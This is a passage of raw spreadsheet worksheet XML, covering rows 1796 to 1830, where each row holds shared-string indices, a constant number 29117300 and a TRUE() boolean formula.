        <v>0</v>
      </c>
      <c r="L1796" t="s">
        <v>98</v>
      </c>
      <c r="R1796" t="s">
        <v>5</v>
      </c>
      <c r="S1796" t="s">
        <v>1229</v>
      </c>
      <c r="T1796" t="s">
        <v>7</v>
      </c>
      <c r="U1796" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1797" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1797" s="1">
        <v>18165</v>
      </c>
      <c r="B1797" t="s">
        <v>0</v>
      </c>
      <c r="C1797" t="s">
        <v>78</v>
      </c>
      <c r="D1797" t="s">
        <v>2097</v>
      </c>
      <c r="E1797" t="s">
        <v>1227</v>
      </c>
      <c r="F1797">
        <v>29117300</v>
      </c>
      <c r="G1797" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1797" t="s">
        <v>2135</v>
      </c>
      <c r="K1797">
        <v>0</v>
      </c>
      <c r="L1797" t="s">
        <v>98</v>
      </c>
      <c r="R1797" t="s">
        <v>5</v>
      </c>
      <c r="S1797" t="s">
        <v>1229</v>
      </c>
      <c r="T1797" t="s">
        <v>7</v>
      </c>
      <c r="U1797" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1798" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1798" s="1">
        <v>18166</v>
      </c>
      <c r="B1798" t="s">
        <v>0</v>
      </c>
      <c r="C1798" t="s">
        <v>1</v>
      </c>
      <c r="D1798" t="s">
        <v>2097</v>
      </c>
      <c r="E1798" t="s">
        <v>1227</v>
      </c>
      <c r="F1798">
        <v>29117300</v>
      </c>
      <c r="G1798" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1798" t="s">
        <v>2136</v>
      </c>
      <c r="K1798">
        <v>0</v>
      </c>
      <c r="L1798" t="s">
        <v>98</v>
      </c>
      <c r="R1798" t="s">
        <v>5</v>
      </c>
      <c r="S1798" t="s">
        <v>1229</v>
      </c>
      <c r="T1798" t="s">
        <v>7</v>
      </c>
      <c r="U1798" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1799" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1799" s="1">
        <v>18167</v>
      </c>
      <c r="B1799" t="s">
        <v>0</v>
      </c>
      <c r="C1799" t="s">
        <v>78</v>
      </c>
      <c r="D1799" t="s">
        <v>2097</v>
      </c>
      <c r="E1799" t="s">
        <v>1227</v>
      </c>
      <c r="F1799">
        <v>29117300</v>
      </c>
      <c r="G1799" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1799" t="s">
        <v>2137</v>
      </c>
      <c r="K1799">
        <v>0</v>
      </c>
      <c r="L1799" t="s">
        <v>98</v>
      </c>
      <c r="R1799" t="s">
        <v>5</v>
      </c>
      <c r="S1799" t="s">
        <v>1229</v>
      </c>
      <c r="T1799" t="s">
        <v>7</v>
      </c>
      <c r="U1799" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1800" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1800" s="1">
        <v>18168</v>
      </c>
      <c r="B1800" t="s">
        <v>0</v>
      </c>
      <c r="C1800" t="s">
        <v>78</v>
      </c>
      <c r="D1800" t="s">
        <v>2097</v>
      </c>
      <c r="E1800" t="s">
        <v>1227</v>
      </c>
      <c r="F1800">
        <v>29117300</v>
      </c>
      <c r="G1800" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1800" t="s">
        <v>2138</v>
      </c>
      <c r="K1800">
        <v>0</v>
      </c>
      <c r="L1800" t="s">
        <v>98</v>
      </c>
      <c r="R1800" t="s">
        <v>5</v>
      </c>
      <c r="S1800" t="s">
        <v>1229</v>
      </c>
      <c r="T1800" t="s">
        <v>7</v>
      </c>
      <c r="U1800" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1801" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1801" s="1">
        <v>18169</v>
      </c>
      <c r="B1801" t="s">
        <v>0</v>
      </c>
      <c r="C1801" t="s">
        <v>78</v>
      </c>
      <c r="D1801" t="s">
        <v>2097</v>
      </c>
      <c r="E1801" t="s">
        <v>1227</v>
      </c>
      <c r="F1801">
        <v>29117300</v>
      </c>
      <c r="G1801" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1801" t="s">
        <v>2139</v>
      </c>
      <c r="K1801">
        <v>0</v>
      </c>
      <c r="L1801" t="s">
        <v>98</v>
      </c>
      <c r="R1801" t="s">
        <v>5</v>
      </c>
      <c r="S1801" t="s">
        <v>1229</v>
      </c>
      <c r="T1801" t="s">
        <v>7</v>
      </c>
      <c r="U1801" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1802" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1802" s="1">
        <v>18170</v>
      </c>
      <c r="B1802" t="s">
        <v>0</v>
      </c>
      <c r="C1802" t="s">
        <v>78</v>
      </c>
      <c r="D1802" t="s">
        <v>2097</v>
      </c>
      <c r="E1802" t="s">
        <v>1227</v>
      </c>
      <c r="F1802">
        <v>29117300</v>
      </c>
      <c r="G1802" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1802" t="s">
        <v>2140</v>
      </c>
      <c r="K1802">
        <v>0</v>
      </c>
      <c r="L1802" t="s">
        <v>98</v>
      </c>
      <c r="R1802" t="s">
        <v>5</v>
      </c>
      <c r="S1802" t="s">
        <v>1229</v>
      </c>
      <c r="T1802" t="s">
        <v>7</v>
      </c>
      <c r="U1802" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1803" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1803" s="1">
        <v>18171</v>
      </c>
      <c r="B1803" t="s">
        <v>0</v>
      </c>
      <c r="C1803" t="s">
        <v>78</v>
      </c>
      <c r="D1803" t="s">
        <v>2097</v>
      </c>
      <c r="E1803" t="s">
        <v>1227</v>
      </c>
      <c r="F1803">
        <v>29117300</v>
      </c>
      <c r="G1803" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1803" t="s">
        <v>2141</v>
      </c>
      <c r="K1803">
        <v>0</v>
      </c>
      <c r="L1803" t="s">
        <v>98</v>
      </c>
      <c r="R1803" t="s">
        <v>5</v>
      </c>
      <c r="S1803" t="s">
        <v>1229</v>
      </c>
      <c r="T1803" t="s">
        <v>7</v>
      </c>
      <c r="U1803" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1804" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1804" s="1">
        <v>18172</v>
      </c>
      <c r="B1804" t="s">
        <v>0</v>
      </c>
      <c r="C1804" t="s">
        <v>78</v>
      </c>
      <c r="D1804" t="s">
        <v>2097</v>
      </c>
      <c r="E1804" t="s">
        <v>1227</v>
      </c>
      <c r="F1804">
        <v>29117300</v>
      </c>
      <c r="G1804" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1804" t="s">
        <v>2142</v>
      </c>
      <c r="K1804">
        <v>0</v>
      </c>
      <c r="L1804" t="s">
        <v>98</v>
      </c>
      <c r="R1804" t="s">
        <v>5</v>
      </c>
      <c r="S1804" t="s">
        <v>1229</v>
      </c>
      <c r="T1804" t="s">
        <v>7</v>
      </c>
      <c r="U1804" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1805" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1805" s="1">
        <v>18173</v>
      </c>
      <c r="B1805" t="s">
        <v>0</v>
      </c>
      <c r="C1805" t="s">
        <v>78</v>
      </c>
      <c r="D1805" t="s">
        <v>2097</v>
      </c>
      <c r="E1805" t="s">
        <v>1227</v>
      </c>
      <c r="F1805">
        <v>29117300</v>
      </c>
      <c r="G1805" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1805" t="s">
        <v>2143</v>
      </c>
      <c r="K1805">
        <v>0</v>
      </c>
      <c r="L1805" t="s">
        <v>98</v>
      </c>
      <c r="R1805" t="s">
        <v>5</v>
      </c>
      <c r="S1805" t="s">
        <v>1229</v>
      </c>
      <c r="T1805" t="s">
        <v>7</v>
      </c>
      <c r="U1805" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1806" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1806" s="1">
        <v>18174</v>
      </c>
      <c r="B1806" t="s">
        <v>0</v>
      </c>
      <c r="C1806" t="s">
        <v>78</v>
      </c>
      <c r="D1806" t="s">
        <v>2097</v>
      </c>
      <c r="E1806" t="s">
        <v>1227</v>
      </c>
      <c r="F1806">
        <v>29117300</v>
      </c>
      <c r="G1806" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1806" t="s">
        <v>2144</v>
      </c>
      <c r="K1806">
        <v>0</v>
      </c>
      <c r="L1806" t="s">
        <v>98</v>
      </c>
      <c r="R1806" t="s">
        <v>5</v>
      </c>
      <c r="S1806" t="s">
        <v>1229</v>
      </c>
      <c r="T1806" t="s">
        <v>7</v>
      </c>
      <c r="U1806" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1807" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1807" s="1">
        <v>18175</v>
      </c>
      <c r="B1807" t="s">
        <v>0</v>
      </c>
      <c r="C1807" t="s">
        <v>78</v>
      </c>
      <c r="D1807" t="s">
        <v>2097</v>
      </c>
      <c r="E1807" t="s">
        <v>1227</v>
      </c>
      <c r="F1807">
        <v>29117300</v>
      </c>
      <c r="G1807" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1807" t="s">
        <v>2145</v>
      </c>
      <c r="K1807">
        <v>0</v>
      </c>
      <c r="L1807" t="s">
        <v>98</v>
      </c>
      <c r="R1807" t="s">
        <v>5</v>
      </c>
      <c r="S1807" t="s">
        <v>1229</v>
      </c>
      <c r="T1807" t="s">
        <v>7</v>
      </c>
      <c r="U1807" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1808" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1808" s="1">
        <v>18176</v>
      </c>
      <c r="B1808" t="s">
        <v>0</v>
      </c>
      <c r="C1808" t="s">
        <v>78</v>
      </c>
      <c r="D1808" t="s">
        <v>2097</v>
      </c>
      <c r="E1808" t="s">
        <v>1227</v>
      </c>
      <c r="F1808">
        <v>29117300</v>
      </c>
      <c r="G1808" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1808" t="s">
        <v>2146</v>
      </c>
      <c r="K1808">
        <v>0</v>
      </c>
      <c r="L1808" t="s">
        <v>98</v>
      </c>
      <c r="R1808" t="s">
        <v>5</v>
      </c>
      <c r="S1808" t="s">
        <v>1229</v>
      </c>
      <c r="T1808" t="s">
        <v>7</v>
      </c>
      <c r="U1808" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1809" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1809" s="1">
        <v>18177</v>
      </c>
      <c r="B1809" t="s">
        <v>0</v>
      </c>
      <c r="C1809" t="s">
        <v>78</v>
      </c>
      <c r="D1809" t="s">
        <v>2097</v>
      </c>
      <c r="E1809" t="s">
        <v>1227</v>
      </c>
      <c r="F1809">
        <v>29117300</v>
      </c>
      <c r="G1809" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1809" t="s">
        <v>2147</v>
      </c>
      <c r="K1809">
        <v>0</v>
      </c>
      <c r="L1809" t="s">
        <v>98</v>
      </c>
      <c r="R1809" t="s">
        <v>5</v>
      </c>
      <c r="S1809" t="s">
        <v>1229</v>
      </c>
      <c r="T1809" t="s">
        <v>7</v>
      </c>
      <c r="U1809" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1810" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1810" s="1">
        <v>18178</v>
      </c>
      <c r="B1810" t="s">
        <v>0</v>
      </c>
      <c r="C1810" t="s">
        <v>78</v>
      </c>
      <c r="D1810" t="s">
        <v>2097</v>
      </c>
      <c r="E1810" t="s">
        <v>1227</v>
      </c>
      <c r="F1810">
        <v>29117300</v>
      </c>
      <c r="G1810" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1810" t="s">
        <v>2148</v>
      </c>
      <c r="K1810">
        <v>0</v>
      </c>
      <c r="L1810" t="s">
        <v>98</v>
      </c>
      <c r="R1810" t="s">
        <v>5</v>
      </c>
      <c r="S1810" t="s">
        <v>1229</v>
      </c>
      <c r="T1810" t="s">
        <v>7</v>
      </c>
      <c r="U1810" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1811" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1811" s="1">
        <v>18179</v>
      </c>
      <c r="B1811" t="s">
        <v>0</v>
      </c>
      <c r="C1811" t="s">
        <v>78</v>
      </c>
      <c r="D1811" t="s">
        <v>2097</v>
      </c>
      <c r="E1811" t="s">
        <v>1227</v>
      </c>
      <c r="F1811">
        <v>29117300</v>
      </c>
      <c r="G1811" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1811" t="s">
        <v>2149</v>
      </c>
      <c r="K1811">
        <v>0</v>
      </c>
      <c r="L1811" t="s">
        <v>98</v>
      </c>
      <c r="R1811" t="s">
        <v>5</v>
      </c>
      <c r="S1811" t="s">
        <v>1229</v>
      </c>
      <c r="T1811" t="s">
        <v>7</v>
      </c>
      <c r="U1811" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1812" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1812" s="1">
        <v>18180</v>
      </c>
      <c r="B1812" t="s">
        <v>0</v>
      </c>
      <c r="C1812" t="s">
        <v>78</v>
      </c>
      <c r="D1812" t="s">
        <v>2097</v>
      </c>
      <c r="E1812" t="s">
        <v>1227</v>
      </c>
      <c r="F1812">
        <v>29117300</v>
      </c>
      <c r="G1812" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1812" t="s">
        <v>2150</v>
      </c>
      <c r="K1812">
        <v>0</v>
      </c>
      <c r="L1812" t="s">
        <v>98</v>
      </c>
      <c r="R1812" t="s">
        <v>5</v>
      </c>
      <c r="S1812" t="s">
        <v>1229</v>
      </c>
      <c r="T1812" t="s">
        <v>7</v>
      </c>
      <c r="U1812" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1813" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1813" s="1">
        <v>18181</v>
      </c>
      <c r="B1813" t="s">
        <v>0</v>
      </c>
      <c r="C1813" t="s">
        <v>78</v>
      </c>
      <c r="D1813" t="s">
        <v>2097</v>
      </c>
      <c r="E1813" t="s">
        <v>1227</v>
      </c>
      <c r="F1813">
        <v>29117300</v>
      </c>
      <c r="G1813" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1813" t="s">
        <v>2151</v>
      </c>
      <c r="K1813">
        <v>0</v>
      </c>
      <c r="L1813" t="s">
        <v>98</v>
      </c>
      <c r="R1813" t="s">
        <v>5</v>
      </c>
      <c r="S1813" t="s">
        <v>1229</v>
      </c>
      <c r="T1813" t="s">
        <v>7</v>
      </c>
      <c r="U1813" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1814" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1814" s="1">
        <v>18182</v>
      </c>
      <c r="B1814" t="s">
        <v>0</v>
      </c>
      <c r="C1814" t="s">
        <v>78</v>
      </c>
      <c r="D1814" t="s">
        <v>2097</v>
      </c>
      <c r="E1814" t="s">
        <v>1227</v>
      </c>
      <c r="F1814">
        <v>29117300</v>
      </c>
      <c r="G1814" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1814" t="s">
        <v>2152</v>
      </c>
      <c r="K1814">
        <v>0</v>
      </c>
      <c r="L1814" t="s">
        <v>98</v>
      </c>
      <c r="R1814" t="s">
        <v>5</v>
      </c>
      <c r="S1814" t="s">
        <v>1229</v>
      </c>
      <c r="T1814" t="s">
        <v>7</v>
      </c>
      <c r="U1814" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1815" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1815" s="1">
        <v>18183</v>
      </c>
      <c r="B1815" t="s">
        <v>0</v>
      </c>
      <c r="C1815" t="s">
        <v>78</v>
      </c>
      <c r="D1815" t="s">
        <v>2097</v>
      </c>
      <c r="E1815" t="s">
        <v>1227</v>
      </c>
      <c r="F1815">
        <v>29117300</v>
      </c>
      <c r="G1815" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1815" t="s">
        <v>2153</v>
      </c>
      <c r="K1815">
        <v>0</v>
      </c>
      <c r="L1815" t="s">
        <v>98</v>
      </c>
      <c r="R1815" t="s">
        <v>5</v>
      </c>
      <c r="S1815" t="s">
        <v>1229</v>
      </c>
      <c r="T1815" t="s">
        <v>7</v>
      </c>
      <c r="U1815" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1816" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1816" s="1">
        <v>18184</v>
      </c>
      <c r="B1816" t="s">
        <v>0</v>
      </c>
      <c r="C1816" t="s">
        <v>78</v>
      </c>
      <c r="D1816" t="s">
        <v>2097</v>
      </c>
      <c r="E1816" t="s">
        <v>1227</v>
      </c>
      <c r="F1816">
        <v>29117300</v>
      </c>
      <c r="G1816" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1816" t="s">
        <v>2154</v>
      </c>
      <c r="K1816">
        <v>0</v>
      </c>
      <c r="L1816" t="s">
        <v>98</v>
      </c>
      <c r="R1816" t="s">
        <v>5</v>
      </c>
      <c r="S1816" t="s">
        <v>1229</v>
      </c>
      <c r="T1816" t="s">
        <v>7</v>
      </c>
      <c r="U1816" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1817" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1817" s="1">
        <v>18185</v>
      </c>
      <c r="B1817" t="s">
        <v>0</v>
      </c>
      <c r="C1817" t="s">
        <v>78</v>
      </c>
      <c r="D1817" t="s">
        <v>2097</v>
      </c>
      <c r="E1817" t="s">
        <v>1227</v>
      </c>
      <c r="F1817">
        <v>29117300</v>
      </c>
      <c r="G1817" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1817" t="s">
        <v>2155</v>
      </c>
      <c r="K1817">
        <v>0</v>
      </c>
      <c r="L1817" t="s">
        <v>98</v>
      </c>
      <c r="R1817" t="s">
        <v>5</v>
      </c>
      <c r="S1817" t="s">
        <v>1229</v>
      </c>
      <c r="T1817" t="s">
        <v>7</v>
      </c>
      <c r="U1817" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1818" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1818" s="1">
        <v>18186</v>
      </c>
      <c r="B1818" t="s">
        <v>0</v>
      </c>
      <c r="C1818" t="s">
        <v>78</v>
      </c>
      <c r="D1818" t="s">
        <v>2097</v>
      </c>
      <c r="E1818" t="s">
        <v>1227</v>
      </c>
      <c r="F1818">
        <v>29117300</v>
      </c>
      <c r="G1818" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1818" t="s">
        <v>2156</v>
      </c>
      <c r="K1818">
        <v>0</v>
      </c>
      <c r="L1818" t="s">
        <v>98</v>
      </c>
      <c r="R1818" t="s">
        <v>5</v>
      </c>
      <c r="S1818" t="s">
        <v>1229</v>
      </c>
      <c r="T1818" t="s">
        <v>7</v>
      </c>
      <c r="U1818" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1819" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1819" s="1">
        <v>18187</v>
      </c>
      <c r="B1819" t="s">
        <v>0</v>
      </c>
      <c r="C1819" t="s">
        <v>78</v>
      </c>
      <c r="D1819" t="s">
        <v>2097</v>
      </c>
      <c r="E1819" t="s">
        <v>1227</v>
      </c>
      <c r="F1819">
        <v>29117300</v>
      </c>
      <c r="G1819" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1819" t="s">
        <v>2157</v>
      </c>
      <c r="K1819">
        <v>0</v>
      </c>
      <c r="L1819" t="s">
        <v>98</v>
      </c>
      <c r="R1819" t="s">
        <v>5</v>
      </c>
      <c r="S1819" t="s">
        <v>1229</v>
      </c>
      <c r="T1819" t="s">
        <v>7</v>
      </c>
      <c r="U1819" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1820" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1820" s="1">
        <v>18188</v>
      </c>
      <c r="B1820" t="s">
        <v>0</v>
      </c>
      <c r="C1820" t="s">
        <v>78</v>
      </c>
      <c r="D1820" t="s">
        <v>2097</v>
      </c>
      <c r="E1820" t="s">
        <v>1227</v>
      </c>
      <c r="F1820">
        <v>29117300</v>
      </c>
      <c r="G1820" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1820" t="s">
        <v>2158</v>
      </c>
      <c r="K1820">
        <v>0</v>
      </c>
      <c r="L1820" t="s">
        <v>98</v>
      </c>
      <c r="R1820" t="s">
        <v>5</v>
      </c>
      <c r="S1820" t="s">
        <v>1229</v>
      </c>
      <c r="T1820" t="s">
        <v>7</v>
      </c>
      <c r="U1820" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1821" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1821" s="1">
        <v>18189</v>
      </c>
      <c r="B1821" t="s">
        <v>0</v>
      </c>
      <c r="C1821" t="s">
        <v>78</v>
      </c>
      <c r="D1821" t="s">
        <v>2097</v>
      </c>
      <c r="E1821" t="s">
        <v>1227</v>
      </c>
      <c r="F1821">
        <v>29117300</v>
      </c>
      <c r="G1821" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1821" t="s">
        <v>2159</v>
      </c>
      <c r="K1821">
        <v>0</v>
      </c>
      <c r="L1821" t="s">
        <v>98</v>
      </c>
      <c r="R1821" t="s">
        <v>5</v>
      </c>
      <c r="S1821" t="s">
        <v>1229</v>
      </c>
      <c r="T1821" t="s">
        <v>7</v>
      </c>
      <c r="U1821" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1822" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1822" s="1">
        <v>18190</v>
      </c>
      <c r="B1822" t="s">
        <v>0</v>
      </c>
      <c r="C1822" t="s">
        <v>78</v>
      </c>
      <c r="D1822" t="s">
        <v>2097</v>
      </c>
      <c r="E1822" t="s">
        <v>1227</v>
      </c>
      <c r="F1822">
        <v>29117300</v>
      </c>
      <c r="G1822" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1822" t="s">
        <v>2160</v>
      </c>
      <c r="K1822">
        <v>0</v>
      </c>
      <c r="L1822" t="s">
        <v>98</v>
      </c>
      <c r="R1822" t="s">
        <v>5</v>
      </c>
      <c r="S1822" t="s">
        <v>1229</v>
      </c>
      <c r="T1822" t="s">
        <v>7</v>
      </c>
      <c r="U1822" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1823" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1823" s="1">
        <v>18191</v>
      </c>
      <c r="B1823" t="s">
        <v>0</v>
      </c>
      <c r="C1823" t="s">
        <v>78</v>
      </c>
      <c r="D1823" t="s">
        <v>2097</v>
      </c>
      <c r="E1823" t="s">
        <v>1227</v>
      </c>
      <c r="F1823">
        <v>29117300</v>
      </c>
      <c r="G1823" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1823" t="s">
        <v>2161</v>
      </c>
      <c r="K1823">
        <v>0</v>
      </c>
      <c r="L1823" t="s">
        <v>98</v>
      </c>
      <c r="R1823" t="s">
        <v>5</v>
      </c>
      <c r="S1823" t="s">
        <v>1229</v>
      </c>
      <c r="T1823" t="s">
        <v>7</v>
      </c>
      <c r="U1823" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1824" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1824" s="1">
        <v>18192</v>
      </c>
      <c r="B1824" t="s">
        <v>0</v>
      </c>
      <c r="C1824" t="s">
        <v>78</v>
      </c>
      <c r="D1824" t="s">
        <v>2097</v>
      </c>
      <c r="E1824" t="s">
        <v>1227</v>
      </c>
      <c r="F1824">
        <v>29117300</v>
      </c>
      <c r="G1824" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1824" t="s">
        <v>2162</v>
      </c>
      <c r="K1824">
        <v>0</v>
      </c>
      <c r="L1824" t="s">
        <v>98</v>
      </c>
      <c r="R1824" t="s">
        <v>5</v>
      </c>
      <c r="S1824" t="s">
        <v>1229</v>
      </c>
      <c r="T1824" t="s">
        <v>7</v>
      </c>
      <c r="U1824" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1825" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1825" s="1">
        <v>18193</v>
      </c>
      <c r="B1825" t="s">
        <v>0</v>
      </c>
      <c r="C1825" t="s">
        <v>78</v>
      </c>
      <c r="D1825" t="s">
        <v>2097</v>
      </c>
      <c r="E1825" t="s">
        <v>1227</v>
      </c>
      <c r="F1825">
        <v>29117300</v>
      </c>
      <c r="G1825" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1825" t="s">
        <v>2163</v>
      </c>
      <c r="K1825">
        <v>0</v>
      </c>
      <c r="L1825" t="s">
        <v>98</v>
      </c>
      <c r="R1825" t="s">
        <v>5</v>
      </c>
      <c r="S1825" t="s">
        <v>1229</v>
      </c>
      <c r="T1825" t="s">
        <v>7</v>
      </c>
      <c r="U1825" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1826" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1826" s="1">
        <v>18194</v>
      </c>
      <c r="B1826" t="s">
        <v>0</v>
      </c>
      <c r="C1826" t="s">
        <v>78</v>
      </c>
      <c r="D1826" t="s">
        <v>2097</v>
      </c>
      <c r="E1826" t="s">
        <v>1227</v>
      </c>
      <c r="F1826">
        <v>29117300</v>
      </c>
      <c r="G1826" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1826" t="s">
        <v>2164</v>
      </c>
      <c r="K1826">
        <v>0</v>
      </c>
      <c r="L1826" t="s">
        <v>98</v>
      </c>
      <c r="R1826" t="s">
        <v>5</v>
      </c>
      <c r="S1826" t="s">
        <v>1229</v>
      </c>
      <c r="T1826" t="s">
        <v>7</v>
      </c>
      <c r="U1826" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1827" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1827" s="1">
        <v>18195</v>
      </c>
      <c r="B1827" t="s">
        <v>0</v>
      </c>
      <c r="C1827" t="s">
        <v>78</v>
      </c>
      <c r="D1827" t="s">
        <v>2097</v>
      </c>
      <c r="E1827" t="s">
        <v>1227</v>
      </c>
      <c r="F1827">
        <v>29117300</v>
      </c>
      <c r="G1827" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1827" t="s">
        <v>2165</v>
      </c>
      <c r="K1827">
        <v>0</v>
      </c>
      <c r="L1827" t="s">
        <v>98</v>
      </c>
      <c r="R1827" t="s">
        <v>5</v>
      </c>
      <c r="S1827" t="s">
        <v>1229</v>
      </c>
      <c r="T1827" t="s">
        <v>7</v>
      </c>
      <c r="U1827" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1828" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1828" s="1">
        <v>18196</v>
      </c>
      <c r="B1828" t="s">
        <v>0</v>
      </c>
      <c r="C1828" t="s">
        <v>78</v>
      </c>
      <c r="D1828" t="s">
        <v>2097</v>
      </c>
      <c r="E1828" t="s">
        <v>1227</v>
      </c>
      <c r="F1828">
        <v>29117300</v>
      </c>
      <c r="G1828" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1828" t="s">
        <v>2166</v>
      </c>
      <c r="K1828">
        <v>0</v>
      </c>
      <c r="L1828" t="s">
        <v>98</v>
      </c>
      <c r="R1828" t="s">
        <v>5</v>
      </c>
      <c r="S1828" t="s">
        <v>1229</v>
      </c>
      <c r="T1828" t="s">
        <v>7</v>
      </c>
      <c r="U1828" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1829" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1829" s="1">
        <v>18197</v>
      </c>
      <c r="B1829" t="s">
        <v>0</v>
      </c>
      <c r="C1829" t="s">
        <v>78</v>
      </c>
      <c r="D1829" t="s">
        <v>2097</v>
      </c>
      <c r="E1829" t="s">
        <v>1227</v>
      </c>
      <c r="F1829">
        <v>29117300</v>
      </c>
      <c r="G1829" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1829" t="s">
        <v>2167</v>
      </c>
      <c r="K1829">
        <v>0</v>
      </c>
      <c r="L1829" t="s">
        <v>98</v>
      </c>
      <c r="R1829" t="s">
        <v>5</v>
      </c>
      <c r="S1829" t="s">
        <v>1229</v>
      </c>
      <c r="T1829" t="s">
        <v>7</v>
      </c>
      <c r="U1829" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1830" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1830" s="1">
        <v>18198</v>
      </c>
      <c r="B1830" t="s">
        <v>0</v>
      </c>
      <c r="C1830" t="s">
        <v>78</v>
      </c>
      <c r="D1830" t="s">
        <v>2097</v>
      </c>
      <c r="E1830" t="s">
        <v>1227</v>
      </c>
      <c r="F1830">
        <v>29117300</v>
      </c>
      <c r="G1830" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1830" t="s">
        <v>2168</v>
      </c>
      <c r="K1830">
        <v>0</v>
      </c>
      <c r="L1830" t="s">
        <v>98</v>
